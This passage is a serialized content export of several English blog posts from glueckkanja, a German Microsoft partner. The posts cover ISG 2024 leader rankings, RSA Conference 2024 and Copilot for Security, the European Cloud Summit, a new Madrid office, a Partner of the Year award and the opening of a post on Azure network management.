glueckkanja a valuable partner in the IT landscape. We are pleased to have been named a leader in our field by ISG Provider Lens™ once again for 2024.",[41,5312,5314],{"id":5313},"the-isg-provider-lens-study-2024","The ISG Provider Lens™ Study 2024",[12,5316,31],{},[12,5318,5319],{},"The ISG Provider Lens™ offers companies a comprehensive tool for decision-making, providing insights into positioning, relationships, and go-to-market considerations. The \"Microsoft Cloud Ecosystem\" study evaluates providers based on their product portfolios and competitive edge in the Microsoft Cloud ecosystem.",[12,5321,5322],{},"The evaluation matrix classifies vendors into four quadrants: Product Challenger, Contender, Market Challenger, and Leader. Leaders have a highly attractive product and service offering and a strong market and competitive position, which ensures both innovation and stability.",[12,5324,5325],{},"glueckkanja was recognized as a leader in four categories.",[41,5327,5329],{"id":5328},"managed-services-for-azure-large-enterprises","Managed Services for Azure — Large Enterprises",[12,5331,31],{},[12,5333,5334],{},[2642,5335],{"alt":5336,"src":5337},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-large-enterprises-en.png",[12,5339,5340],{},"In Managed Services for Azure, glueckkanja stands out as a leader in cloud management with a focus on automation, standardization, and continuous optimization. The use of Infrastructure as Code (IaC) for effective cloud strategy implementation is particularly noteworthy. According to ISG, the company has positioned itself as a future-oriented pioneer in Microsoft Cloud Management:",[1254,5342,5343,5349,5360],{},[1257,5344,5345,5348],{},[251,5346,5347],{},"Focus on Infrastructure as Code (IaC):"," glueckkanja uses IaC to provide efficient, fast and scalable cloud infrastructures. This methodology enables to define and manage infrastructures via automatable code scripts, resulting in significantly enhanced consistency and quality of cloud services. Adopting IaC over traditional scripting methods underlines glueckkanja’s modern approach to\ncloud management.",[1257,5350,5351,5354,5355,5359],{},[251,5352,5353],{},"Integration with security and compliance standards:"," glueckkanja’s commitment to high security and compliance standards, including ISO 27001, positions it as a trusted partner for cloud services. Aligning with the",[2672,5356,5358],{"href":5357},"/en/azure/cloud-adoption-framework","Microsoft Cloud Adoption Framework"," and Well-Architected Framework forms the foundation for developing and optimizing customer-specific cloud strategies, creating a comprehensive framework for compliance with cloud management best practices.",[1257,5361,5362,5365,5366,5370],{},[251,5363,5364],{},"Cloud Competence Center (CCC):"," By offering the ",[2672,5367,5369],{"href":5368},"/en/azure/cloud-competence-center","Cloud Competence Center",", glueckkanja emphasizes the importance of continuous improvement and adaptation to organizational needs. The CCC serves as a consulting and support platform for developing cloud strategies and promotes a culture of innovation.",[41,5372,5374],{"id":5373},"managed-services-for-azure-midmarket","Managed Services for Azure — Midmarket",[12,5376,31],{},[12,5378,5379],{},[2642,5380],{"alt":5381,"src":5382},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-midmarket-en.png",[12,5384,5385],{},"As a recognized and leading German provider of Managed Services on the Azure platform, glueckkanja maintains its top position this year. The company introduces enterprise security standards to the midmarket and excels with fast, high-quality cloud management solutions:",[1254,5387,5388,5394,5400],{},[1257,5389,5390,5393],{},[251,5391,5392],{},"Understanding SMEs:"," glueckkanja understands SMEs’ unique challenges and needs in cloud management. Leveraging code-based deployment (IaC) enables fast and efficient provision of cloud infrastructures tailored to SMEs’ requirements and resources. This methodology supports SMEs in scaling their IT infrastructures flexibly and cost-effectively.",[1257,5395,5396,5399],{},[251,5397,5398],{},"High-level security and compliance standards:"," Especially for SMEs, where resources may be limited, partnering with a provider that meets the highest security and compliance requirements is imperative. glueckkanja attaches great importance to adhering to standards such as ISO 27001, follows frameworks such as the Microsoft Cloud Adoption Framework and the Well- Architected Framework and even goes beyond them.",[1257,5401,5402,5405],{},[251,5403,5404],{},"Consulting and continuous improvement:"," Through the Cloud Competence Center (CCC), glueckkanja specifically addresses the needs of midsize companies. The CCC offers specialized consulting and support in developing and implementing cloud strategies.",[41,5407,5409],{"id":5408},"microsoft-365-services-large-enterprises","Microsoft 365 Services — Large Enterprises",[12,5411,31],{},[12,5413,5414],{},[2642,5415],{"alt":5416,"src":5417},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-large-enterprises-en.png",[12,5419,5420],{},"glueckkanja excels with efficient and secure services that standardize digitalization in large enterprises while considering individual compliance and governance requirements. In this regard, leading ISG analyst Axel Oppermann states, \"glueckkanja stands out as a leading Microsoft security partner in Germany with innovative IT solutions aimed at optimizing and securing modern workplaces.\"",[1254,5422,5423,5434,5444],{},[1257,5424,5425,5428,5429,5433],{},[251,5426,5427],{},"Innovative workplace design:"," glueckkanja empowers users in their daily work and working environment by implementing ",[2672,5430,5432],{"href":5431},"/en/workplace/managed-workplace/","managed workplaces"," that fully integrate Microsoft 365 and Identity Services. This service enables location-independent work with up-to-date software and always ensures security. It is available on both Windows and Apple systems.",[1257,5435,5436,5439,5440,5443],{},[251,5437,5438],{},"Comprehensive cloud security:"," glueckkanja offers a comprehensive security solution from the cloud, using Entra ID and Windows Hello authentication technology on Windows Enterprise Clients, protected by Microsoft 365 Defender. Integrating Autopilot into Microsoft Intune, supplemented by ",[2672,5441,2677],{"href":5442,"target":4914},"https://www.realmjoin.com",", optimizes IT tasks and increases IT department productivity.",[1257,5445,5446,5449,5450,5454],{},[251,5447,5448],{},"Pioneering in Windows 365 Cloud PC development and Microsoft 365 integration:"," The ",[2672,5451,5453],{"href":5452},"/en/workplace/windows365-cloud-pc/","Windows 365 Cloud PC"," offers a pioneering solution that provides a complete Windows operating system from the cloud, combining Microsoft 365 and Windows 365 from a single source. This technology allows for rapid scaling and immediate operational readiness. Glueckkanja’s involvement in development and early-stage customer projects underlines its role as an innovative pioneer.",[41,5456,5458],{"id":5457},"microsoft-365-services-midmarket","Microsoft 365 Services — Midmarket",[12,5460,31],{},[12,5462,5463],{},[2642,5464],{"alt":5465,"src":5466},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-midmarket-en.png",[12,5468,5469],{},"Specializing in modern workplace solutions and cloud infrastructures, glueckkanja effectively and securely supports mid-sized businesses in their digital transformation. The company emerges as a leader with its offerings of highly secure and efficient digital workplace solutions for the midmarket. Expertise in Managed Workplaces and innovative integrations set new standards:",[1254,5471,5472,5478,5484],{},[1257,5473,5474,5477],{},[251,5475,5476],{},"A pioneer in security and digitalization:"," As a leading force in Microsoft security in Germany, glueckkanja prioritizes maximizing the benefits and efficiency of digital workplaces with Microsoft 365 and beyond for its customers. The company sets itself apart through comprehensive support and customized solutions tailored to midsize companies’ requirements. The focus is always on security, quality and speed.",[1257,5479,5480,5483],{},[251,5481,5482],{},"Innovative cross-platform workplace design:"," glueckkanja promotes a modern working environment through Managed Workplaces and integrating Microsoft 365 and Identity Services. This enables efficient and secure working on Windows and Apple systems and increases employee flexibility and productivity.",[1257,5485,5486,5489],{},[251,5487,5488],{},"Pioneering role in Windows 365 Cloud PC and integration with Microsoft 365:"," Windows 365 Cloud PC offers a pioneering solution, providing a complete Windows operating system from the cloud. In other words, Microsoft 365 and Windows 365 from a single source. This technology enables rapid scaling and immediate operational readiness. glueckkanja played a key role in its development and gained experience in customer projects at an early stage, which underlines its role as an innovative pioneer.",{"title":65,"searchDepth":111,"depth":111,"links":5491},[5492,5493,5494,5495,5496],{"id":5313,"depth":111,"text":5314},{"id":5328,"depth":111,"text":5329},{"id":5373,"depth":111,"text":5374},{"id":5408,"depth":111,"text":5409},{"id":5457,"depth":111,"text":5458},{"lang":2171,"seoTitle":5498,"titleClass":2173,"date":5499,"categories":5500,"blogtitlepic":5501,"socialimg":5502,"customExcerpt":5503,"keywords":5504,"hreflang":5505,"scripts":5508},"ISG 2024: glueckkanja reaffirmed as Leader in Managed Services for Azure and Microsoft 365 Services","2024-04-24",[2962],"head-isg-2024","/blog/heads/head-isg-2024.png","Once again, glueckkanja has been confirmed as a leader in the sectors of 'Managed Services for Azure' and 'Microsoft 365 Services' for both the Midmarket and Large Enterprises categories in the ISG study. The report particularly highlights the company's innovative solutions that establish glueckkanja as a frontrunner for customers.","glueckkanja, Microsoft Partner, Managed Cloud Services, IT Service Provider, Microsoft Cloud Ecosystem, Azure Services, Cloud Security Solutions, ISG Provider Lens 2024, Microsoft 365 Services, Cloud Competence Center",[5506],{"lang":2260,"href":5507},"/blog/corporate/2024/04/isg",{"slick":2181,"form":2181},"/posts/2024-04-25-isg",{"title":5304,"description":5310},"posts/2024-04-25-isg",[2972,4401],"ukt4kGd_2-Shp9jmTaAEBTlcGXu08fxuuuN0TZlio2w",{"id":5515,"title":5516,"author":5517,"body":5518,"cta":2166,"description":5522,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5583,"moment":5585,"navigation":2181,"path":5616,"seo":5617,"stem":5618,"tags":5619,"webcast":2168,"__hash__":5621},"content_en/posts/2024-04-30-gk-at-rsac.md","glueckkanja @ RSA Conference",[2461],{"type":9,"value":5519,"toc":5578},[5520,5523,5531,5535,5537,5545,5548,5552,5554,5557,5560,5566,5570,5572,5575],[12,5521,5522],{},"For over three decades, the RSA Conference has been a key force in the cybersecurity community. In a world where threats from attacks are growing every day, this conference has become essential for anyone dealing with online security. The well-known conference is always held in sunny California, and glueckkanja is once again participating.",[12,5524,5525,5526,5530],{},"As a member of the ",[2672,5527,5529],{"href":5528,"target":4914},"https://www.microsoft.com/de-de/security/business/intelligent-security-association","Microsoft Intelligent Security Association (MISA)",", an association of important security partners of Microsoft, we share the common goal of developing top-notch security solutions and protecting customers from threats.",[41,5532,5534],{"id":5533},"ai-in-focus-of-the-rsa-conference-2024","AI in focus of the RSA Conference 2024",[12,5536,31],{},[12,5538,5539,5540,5544],{},"This year, Microsoft is focusing the ",[2672,5541,5543],{"href":5542,"target":4914},"https://www.microsoft.com/en-us/security/blog/2024/04/04/explore-microsofts-ai-innovations-at-rsa-conference-2024","conference program"," entirely on Copilot for Security, the innovative AI solution designed to help security and IT experts identify undetected risks.",[12,5546,5547],{},"This is an exciting topic in the current discussion, which our Security Lead, Jan Geisbauer, is eager to engage with. In his session at the Microsoft booth (May 7, 17:30 - 17:50) during the RSA Conference, he will introduce this new technology, explore its capabilities, but also address its current limitations. We have summarized the key points here.",[41,5549,5551],{"id":5550},"microsoft-copilot-for-security-for-threat-detection","Microsoft Copilot for Security for Threat Detection",[12,5553,31],{},[12,5555,5556],{},"For a long time, risk detection depended on what's known as 'signature-based detection'—a method that identifies threats based on recognized patterns. However, as the threat landscape continues to change and attackers constantly adapt their strategies, this approach alone is no longer sufficient for protection. The next advancement in security technology involves leveraging big data for threat detection. Modern software solutions automatically analyze extensive data sets to detect patterns and potential risks. Nonetheless, to effectively minimize false positives, the expertise of trained specialists is essential. Given the vast amounts of data that need to be processed, this demands significant resources. This is exactly where Microsoft Copilot for Security steps in with innovative solutions designed to support security teams and enhance protection.",[12,5558,5559],{},"In addition to summaries of the most important facts about data security incidents with suggested solutions, Copilot for Security can also respond to prompts about cybersecurity and your own systems. The tool additionally manages more complex tasks, such as crafting your own KQL queries to pull specific security data. One particularly useful feature is script analysis, which greatly accelerates the examination of suspicious scripts and command lines.",[12,5561,5562],{},[2642,5563],{"alt":5564,"src":5565},"A screenshot of the script analysis function of Copilot for Security from Microsoft","https://res.cloudinary.com/c4a8/image/upload/v1714461543/blog/pics/rsac-copilot-for-security-script-analysis.png",[41,5567,5569],{"id":5568},"add-copilot-for-security-to-your-system","Add Copilot for Security to Your System",[12,5571,31],{},[12,5573,5574],{},"Like any Large Language Model (LLM), Copilot for Security still requires the careful oversight of experts. However, particularly when analyzing raw data, Copilot for Security proves to be a potent tool that enables customers and Microsoft Security Service Providers (MSSP) to make quicker and more informed decisions.",[12,5576,5577],{},"At glueckkanja, we consider it our mission to constantly improve and find new, innovative ways to protect our customers from the increasing digital threats of everyday life. We therefore recommend that our customers incorporate Copilot for Security into their systems, and we are eager to assist them in planning, implementing, and utilizing the tool.",{"title":65,"searchDepth":111,"depth":111,"links":5579},[5580,5581,5582],{"id":5533,"depth":111,"text":5534},{"id":5550,"depth":111,"text":5551},{"id":5568,"depth":111,"text":5569},{"lang":2171,"seoTitle":5584,"titleClass":2173,"date":5585,"categories":5586,"blogtitlepic":5587,"socialimg":5588,"customExcerpt":5589,"keywords":5590,"contactInContent":5591,"hreflang":5610,"scripts":5615},"glueckkanja at the RSA Conference 2024","2024-04-30",[2176],"head-rsa-conference-2024","/blog/heads/head-rsa-conference-2024.png","When the RSA Conference opens its doors from May 6 to 9, 2024, the glueckkanja team around CEO Christian Kanja and Security Lead Jan Geisbauer will be there again. This year, we will be taking a closer look at the new Microsoft Copilot for Security.","glueckkanja, RSA Conference 2024, Microsoft Copilot for Security, Cybersecurity AI Solutions, MISA Awards, Security MSSP of the Year, Signature-Based Detection, Microsoft Intelligent Security Association, Big Data Security Analysis, Microsoft Security Service Provider, AI Cybersecurity Innovation, Script Analysis Tool",{"quote":2181,"infos":5592},{"headline":5263,"subline":5593,"level":41,"textStyling":2204,"flush":2205,"person":5594,"form":5599},"Do you have any questions? We are happy to help you make your business even more secure with Microsoft Copilot for Security.",{"image":2207,"mail":5266,"number":5267,"cloudinary":2181,"alt":2209,"name":2209,"quotee":2209,"quoteeTitle":5108,"quote":5595,"detailsHeader":5269,"details":5596},"Working with Copilot for Security is like wearing an exoskeleton for analysts. All their skills and knowledge are suddenly and massively amplified. We at glueckkanja love Copilot for Security.",[5597,5598],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5600,"method":2169,"action":2216,"fields":5601},{"skin":2215},[5602,5603,5604,5605,5606,5608,5609],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":5288,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5607},"Request Copilot for Security advice",{"type":2241,"id":2250,"value":5292},{"type":2241,"id":2253},[5611,5613],{"lang":2260,"href":5612},"/blog/security/2024/04/gk-at-rsac",{"lang":2263,"href":5614},"/blog/security/2024/04/gk-at-rsac-es",{"slick":2181,"form":2181},"/posts/2024-04-30-gk-at-rsac",{"title":5516,"description":5522},"posts/2024-04-30-gk-at-rsac",[5620,5014,2176],"MISA","W_Z6TQYrMSm4TQl72WjJUmGXdeQiBFNCUXm8Udnve5g",{"id":5623,"title":5624,"author":5625,"body":5626,"cta":2166,"description":5630,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5709,"moment":5711,"navigation":2181,"path":5721,"seo":5722,"stem":5723,"tags":5724,"webcast":2168,"__hash__":5727},"content_en/posts/2024-05-06-cloud-summit.md","glueckkanja @ Cloud Summit",[2461],{"type":9,"value":5627,"toc":5705},[5628,5631,5634,5637,5641,5643,5646,5649,5663,5666,5670,5672,5675,5678,5681,5684,5696,5698],[12,5629,5630],{},"These days, everyone is talking about artificial intelligence. The new technology is no longer a futuristic idea, but something that can boost your company's efficiency and proficiency in daily business – provided it is integrated properly into the infrastructure of the organization.",[12,5632,5633],{},"And that's where the trouble often starts. Countless companies continue to rely on outdated technology, even the fax machine is still a much-used tool across Europe. 69% of leaders don't have a clearly defined cloud strategy and 51% of organizations are still trying to understand their on-premises environments *.",[12,5635,5636],{},"Moving towards the future of cloud-management seems to be a steep climb for many companies. But it doesn't have to be.",[41,5638,5640],{"id":5639},"glueckkanja-is-your-techstack","glueckkanja is your TechStack",[12,5642,31],{},[12,5644,5645],{},"The first step of integrating Microsoft Copilot into your company is realizing that AI is deeply dependent on massive amounts of data. For these tools to work, you need to develop a clear strategy on how this data is acquired, processed and used. This needs to happen efficiently and above all securely.",[12,5647,5648],{},"At glueckkanja, we specialize in cloud management with a focus on automation, standardization, and continuous optimization. To effectively implement a cloud strategy, we heavily rely on the use of Infrastructure as Code (IaC). As a long-term Microsoft partner, we offer comprehensive cloud solutions in a number of areas:",[1254,5650,5651,5654,5657,5660],{},[1257,5652,5653],{},"Workplace: We set the standard for speed, security and efficiency in Microsoft 365 rollouts across any scale with managed workplace solutions as well as our consulting services.",[1257,5655,5656],{},"Azure: From ground zero to peak efficiency. Secure, standardize and optimize your infrastructure, processes and tools with our managed Azure and AVD Foundation.",[1257,5658,5659],{},"Security: In our connected world, cybersecurity needs to be top priority for companies. As Europe's leading MXDR partner for deploying and managing Defender and Sentinel, we help you to secure your digital environment.",[1257,5661,5662],{},"Products: Enhance your Microsoft 365 power with our cloud-native companion products which improve collaboration, software management and network authentication – like our RADIUSaaS, which works great with Microsoft Cloud PKI and others.",[12,5664,5665],{},"You want to know more about what we can do for you? Visit us on the Cloud Summit!",[41,5667,5669],{"id":5668},"glueckkanja-at-the-european-cloud-summit-2024","glueckkanja at the European Cloud Summit 2024",[12,5671,31],{},[12,5673,5674],{},"From May 14th to May 16th, you can find us at booth 32-CD at the RheinMain CongressCenter, where the Cloud Summit is taking place. We're looking forward to lots of exciting conversations with everyone dropping by our booth.",[12,5676,5677],{},"But of course, we're also joining the conversation onstage with a session from Dr. Christoph Hannebauer, Senior Developer at glueckkanja. Christoph will talk about our products SCEP and RADIUS and tell you everything you'll need to know to utilize both of them for your company. In the words of Christoph:",[12,5679,5680],{},"\"Certificate-based authentication (CBA) can be used even when no internet is available. This makes it the ideal choice for network authentication. In my session, I will explain how to enroll certificates to modern workplaces and manage CBA with a cloud-only Certification Authority (CA) and RADIUS. This allows organizations to get rid of on-prem PKIs and NACs and reap the benefits of a cost-effective cloud architecture.\"",[12,5682,5683],{},"Don't miss the session on Wednesday, May 15, 2024, at 12 pm and feel free to catch up with Christoph and us after the session for all your remaining questions and thoughts.",[12,5685,5686,5687,5689,5691,5692,1013],{},"Get in touch with us via ",[2672,5688],{"href":5278},[2672,5690,5277],{"href":5278}," or stay up to date on LinkedIn: ",[2672,5693,5694],{"href":5694,"rel":5695},"https://www.linkedin.com/company/glueckkanja/",[2676],[12,5697,5269],{},[12,5699,5700],{},[5701,5702,5704],"sup",{"id":5703},"fn1","* Source: \"State of the Cloud\" Pluralsight Study June 2023",{"title":65,"searchDepth":111,"depth":111,"links":5706},[5707,5708],{"id":5639,"depth":111,"text":5640},{"id":5668,"depth":111,"text":5669},{"lang":2171,"seoTitle":5710,"titleClass":2173,"date":5711,"categories":5712,"blogtitlepic":5713,"socialimg":5714,"customExcerpt":5715,"keywords":5716,"hreflang":5717,"scripts":5720},"glueckkanja at the Cloud Summit 2024","2024-05-06",[4232],"head-cloud-summit-2024","/heads/head-cloud-summit-2024.png","The European Cloud Summit is happening May 14-16 in Wiesbaden, Germany. It’s a major gathering for anyone involved with cloud management. We at glueckkanja are excited to participate, share new ideas, and engage in meaningful conversations. Come find us at our booth or join us for an enlightening talk by Dr. Christoph Hannebauer.","glueckkanja Cloud Summit, European Cloud Summit 2024, cloud management experts, Infrastructure as Code (IaC), Microsoft Copilot integration, AI in cloud management, Microsoft 365 rollout, Managed Azure services, cybersecurity MXDR, cloud-based Microsoft solutions, cloud strategy development, network authentication solutions, cloud-native products, Cloud PKI, RADIUSaaS",[5718],{"lang":2260,"href":5719},"/blog/azure/2024/05/cloud-summit",{"slick":2181,"form":2181},"/posts/2024-05-06-cloud-summit",{"title":5624,"description":5630},"posts/2024-05-06-cloud-summit",[5725,5726,4232,4922,4845],"Flight Engineer","Cloud Management","7rYCf_krzpfHDIXZ8MNzO7_EvG1YM5dif2anW2TXAN4",{"id":5729,"title":5730,"author":5731,"body":5732,"cta":2166,"description":5736,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5772,"moment":5774,"navigation":2181,"path":5825,"seo":5826,"stem":5827,"tags":5828,"webcast":2168,"__hash__":5830},"content_en/posts/2024-05-27-gk-in-spain.md","Viva España, Viva La felicidadkanja",[2500],{"type":9,"value":5733,"toc":5768},[5734,5737,5741,5743,5746,5756,5760,5762,5765],[12,5735,5736],{},"We apologize on behalf of all the Germans that have descended on your country in the past. We promise we are different: Efficient, reliable, and fond of German engineering!",[41,5738,5740],{"id":5739},"glueckkanja-launches-its-first-office-in-spain","glueckkanja launches its first office in Spain",[12,5742,31],{},[12,5744,5745],{},"Since the beginning of the year, we have also launched a glueckkanja office in Madrid at Calle de Goya 36 in the Salamanca district, not far from the Basilica de la Concepción de Nuestra Señora and the city's bustling center.",[12,5747,5748,5749,1884,5751,5755],{},"From Spain's capital, we offer our extensive expertise in cybersecurity to companies across the entire Iberian Peninsula. As one of Microsoft's key global partners and as a partner of Microsoft Spain, we offer security solutions, such as ",[2672,5750,3660],{"href":5241},[2672,5752,5754],{"href":5753},"/en/azure/azure-emergency-response-environment/","AzERE",", as individually tailored packages that integrate seamlessly into existing processes. This strategy not only provides comfort to our customers and creates practical synergies in implementation but is particularly promising in Spain, one of the world's countries that is hardest hit by cyberattacks.",[41,5757,5759],{"id":5758},"german-engineering-with-spanish-passion","German engineering with Spanish passion",[12,5761,31],{},[12,5763,5764],{},"Our style is just as efficient (typically German!) as it is unique. The Security Operations Center is delivered directly by our German team. Our analysis and consultation are contain the right dose of Spanish passion and a deep understanding of business practices on the Iberian pensinsula.",[12,5766,5767],{},"Feel free to visit us at Calle de Goya. We would be happy to chat with you about our cybersecurity portfolio. In Spanish, English or German – as you prefer!",{"title":65,"searchDepth":111,"depth":111,"links":5769},[5770,5771],{"id":5739,"depth":111,"text":5740},{"id":5758,"depth":111,"text":5759},{"lang":2171,"seoTitle":5773,"titleClass":2173,"date":5774,"categories":5775,"blogTitleImages":5776,"blogtitlepic":5787,"socialimg":5788,"customExcerpt":5789,"keywords":5790,"contactInContent":5791,"hreflang":5819,"scripts":5824},"glueckkanja opens first office in Spain","2024-05-27",[2962],[5777,5779,5781,5783,5785],{"img":5778,"cloudinary":2181},"/blog/heads/head-spain-reserved-en.png",{"img":5780,"cloudinary":2181},"/blog/heads/head-spain-temperature-en.png",{"img":5782,"cloudinary":2181},"/blog/heads/head-spain-hacker-en.png",{"img":5784,"cloudinary":2181},"/blog/heads/head-spain-cyberattack-en.png",{"img":5786,"cloudinary":2181},"/blog/heads/head-spain-pronunciation-en.png","head-spain-reserved-en","/heads/head-spain-reserved-en.png","You know the type: Germans who tiptoe out of their room early in the morning to reserve the best lounge chairs at the pool (even before the Brits!). Who wear white tennis socks with their sandals. Who drink Sangria out of buckets with straws. Who say 'Pa-ELLA' instead of 'Pa-E-ya' (and 'Ma–LLOR-ca' instead of 'Ma-YOR-ca').","glueckkanja, Madrid, German company in Spain, Cybersecurity, Microsoft, German Engineering, glueckkanja Iberica",{"quote":2181,"infos":5792},{"headline":5793,"subline":5794,"level":41,"textStyling":2204,"flush":2205,"person":5795,"form":5805},"Contact Us Now","Want to know what we can do for you in Spain? We would be happy to chat with you about our services and technologies and look forward to hearing from you!",{"image":5796,"cloudinary":2181,"alt":2500,"name":2500,"quotee":2500,"quoteeTitle":5797,"quote":5798,"detailsHeader":5799,"details":5800},"/people/people-juan-jose-fernandez.jpg","Regional Sales Manager","Our new office in Madrid combines German precision and Spanish passion for our streamlined, innovative security solutions that build trust with clients based on local roots.","We look forward to \u003Cbr />hearing from you!'",[5801,5804],{"text":5802,"href":5803,"details":5274,"icon":5275},"+34 680 225643","tel:+34 680 225643",{"text":5277,"href":5278,"icon":5279},{"ctaText":2213,"cta":5806,"method":2169,"action":2216,"fields":5807},{"skin":2215},[5808,5809,5810,5812,5814,5816,5818],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":5811,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},"Email Address*",{"label":5813,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored for the purpose of processing and answering your inquiry. For more information on data protection, see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2247,"value":5815},"Inquiry Services in Spain",{"type":2241,"id":2250,"value":5817},"gk-in-spain",{"type":2241,"id":2253},[5820,5822],{"lang":2260,"href":5821},"/blog/corporate/2024/05/gk-in-spain",{"lang":2263,"href":5823},"/blog/corporate/2024/05/gk-in-spain-es",{"slick":2181,"form":2181},"/posts/2024-05-27-gk-in-spain",{"title":5730,"description":5736},"posts/2024-05-27-gk-in-spain",[2176,5829,2971],"Spain","B31xFeLbnIi-jDhsS5c-6kClAkmBHgKdVGjmbm-qBow",{"id":5832,"title":5833,"author":5834,"body":5835,"cta":2166,"description":5839,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5852,"moment":5854,"navigation":2181,"path":5892,"seo":5893,"stem":5894,"tags":5895,"webcast":2168,"__hash__":5896},"content_en/posts/2024-06-26-partner-of-the-year-2024.md","Partner of the Yeah, Yeah, Yeah, Year!",[2461],{"type":9,"value":5836,"toc":5850},[5837,5840,5843],[12,5838,5839],{},"As of today, it’s official: We are once again Microsoft Partner of the Year! Among a global field of top Microsoft partners, we have been honored in 2024 for our outstanding performance and innovative customer solutions based on Microsoft technologies. With over 4,700 nominations and participants from over 100 countries, we have made it to the top! We extend our heartfelt thanks to the entire Microsoft team. It’s always wonderful to know how much you appreciate our work for our customers. Everyone at glueckkanja is thrilled to have you as our partner!",[12,5841,5842],{},"We received this year's \"Partner of the Year\" award for transforming the digital workspaces at a northern German bank. The challenge here was to set new standards for innovation and agility in endpoint management solutions. With our self-developed, cloud-based workplace solutions based on Microsoft E5 and Windows 365, we were able to enhance security, efficiency, and satisfaction—while simultaneously reducing costs and increasing productivity. This not only redefined the customer's digital workspace but also established us as a market leader in modern endpoint management solutions. If you’d like to learn more about our “Partner of the Year” case and our award, we’d be happy to personally introduce you to the transformation process.",[12,5844,5845,5846,5849],{},"Now, we're off to celebrate – and we recommend checking out the full list of winners and finalists, which you can find ",[2672,5847,3116],{"href":5848},"https://aka.ms/2024POTYAWinnersFinalists",". Once again, congratulations to all the winners and finalists from all of us.",{"title":65,"searchDepth":111,"depth":111,"links":5851},[],{"lang":2171,"seoTitle":5853,"titleClass":2173,"date":5854,"categories":5855,"blogtitlepic":5856,"socialimg":5857,"customExcerpt":5858,"keywords":5859,"contactInContent":5860,"hreflang":5886,"scripts":5891},"glueckkanja is Microsoft Partner of the Year 2024","2024-06-26",[2962],"head-partner-of-the-year-2024","/heads/head-partner-of-the-year-2024.jpg","Once is just a start, and five times puts you in the establishment. But what do you say to being named Microsoft „Partner of the Year“ for the eighth time? We say: Partner of the Yeah, Yeah, Yeah, Year!","POY, Award, Microsoft Partner of the Year 2024, Transformation process, Endpoint Management, Microsoft E5, Windows 365, Country Partner of the Year",{"quote":2181,"infos":5861},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5793,"subline":5866,"level":41,"textStyling":2204,"flush":2205,"person":5867,"form":5875},"var(--color-secondary)","var(--color-copy)","var(--color-blue-medium)","var(--color-white)","Want to dive deeper into our case and award? We would love to walk you through our transformation process personally. Reach out and let us connect!",{"image":5868,"cloudinary":2181,"alt":2420,"name":2420,"quotee":2420,"quoteeTitle":5869,"quote":5870,"detailsHeader":5269,"details":5871},"/people/people-christian-kanja.jpg","CEO","This award is not just an honor, but a motivation. Huge thanks to our fantastic glueckkanja team, our incredible collaboration with clients, and, of course, our teammates at Microsoft. Together, we have achieved great things and have even greater goals ahead.",[5872,5874],{"text":5272,"href":5273,"details":5873,"icon":5275},"Jetzt anrufen",{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5876,"method":2169,"action":2216,"fields":5877},{"skin":2215},[5878,5879,5880,5881,5882,5884,5885],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5883},"Request POY Case",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[5887,5889],{"lang":2260,"href":5888},"/blog/corporate/2024/06/partner-of-the-year-2024",{"lang":2263,"href":5890},"/blog/corporate/2024/06/partner-of-the-year-2024-es",{"slick":2181,"form":2181},"/posts/2024-06-26-partner-of-the-year-2024",{"title":5833,"description":5839},"posts/2024-06-26-partner-of-the-year-2024",[2972,2973],"bzZGA6-zZ5eXSbyz7uIZST3OUrIie5WL0hEayEmP6WY",{"id":5898,"title":5899,"author":5900,"body":5901,"cta":2166,"description":5905,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5923,"moment":5925,"navigation":2181,"path":5956,"seo":5957,"stem":5958,"tags":5959,"webcast":2168,"__hash__":5961},"content_en/posts/2024-07-02-azure-network-management.md","Network Management in Azure: Freedoms & Nuances",[2401],{"type":9,"value":5902,"toc":5921},[5903,5906,5909,5912,5915,5918],[12,5904,5905],{},"In customer projects, we often encounter a variety of network implementations in the cloud. Some customers opt for entirely independent network stacks for delivering IaaS services in Azure, such as virtual servers. Others use traditional, network-independent PaaS and SaaS services accessible over the internet or through Microsoft's backbone network via a public endpoint. Adapting on-premises network environments to the cloud is also common but often introduces unnecessary complexity and issues. Clearly, the approaches are diverse, and the implementation possibilities just as complex.",[12,5907,5908],{},"Careful planning is fundamentally important in Azure, yet it's not immutable. To build a hybrid infrastructure, overlapping IP ranges between cloud and on-premises should be avoided. Beyond such fundamental decisions, a variety of solutions can be implemented at any time. Services like Azure Firewall offer excellent edge security service for outbound and inbound traffic at various performance levels. There is no need to deploy third-party NVA solutions or reroute traffic to an on-premises firewall, which can be costly. The Azure Application Gateway with WAF (Web Application Firewall) provides an excellent solution for securely deploying internet-facing web services, akin to a simplified DMZ. Recently, it has also become possible to publish and secure other ports beyond the typical web service ports like 80 and 